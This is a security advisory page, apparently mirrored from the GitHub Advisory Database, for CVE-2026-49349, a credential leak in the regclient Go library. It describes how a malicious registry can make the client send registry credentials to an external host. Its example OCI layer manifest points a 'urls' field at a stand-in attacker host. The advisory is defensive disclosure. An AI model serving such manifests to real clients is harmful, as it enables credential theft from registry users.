mediumCVSS 6.8Vulnerability

CVE-2026-49349

Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs. ## Example attack A malicious registry serves an OCI image manifest containing a layer descriptor with a `urls` field pointing to an attacker controlled host: ```json { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip", "digest": "sha256:...", "size": 1024, "urls": ["https://malicious.example.org/blobs/sha256/..."] } ``` When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server. ## Timeline - 2026-05-25: Advisory submitted - 2026-05-26: Fix released ## Credit Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security

Properties

ghsa_id
GHSA-qvqc-4c52-x6qp
severity
medium
summary
regclient may leak authentication credentials to external blob stores
cvss_score
6.8
cve_id
CVE-2026-49349
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
is_ghsa_only
false
ghsa_published
2026-06-26T22:43:31Z
source_url
https://github.com/advisories/GHSA-qvqc-4c52-x6qp
ghsa_updated
2026-06-26T22:43:32Z

Related Entities (4)

HAS_WEAKNESS (1)

[Weakness]Insufficiently Protected Credentials

REPORTED_BY (1)

[Source]GitHub Advisory Database

VULNERABLE_TO (1)

[Software]go/github.com/regclient/regclient

AFFECTS (1)

[Software]go/github.com/regclient/regclient

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-49349 (CVSS 6.8) — Ninja Signal Threat Intelligence | Ninja Signal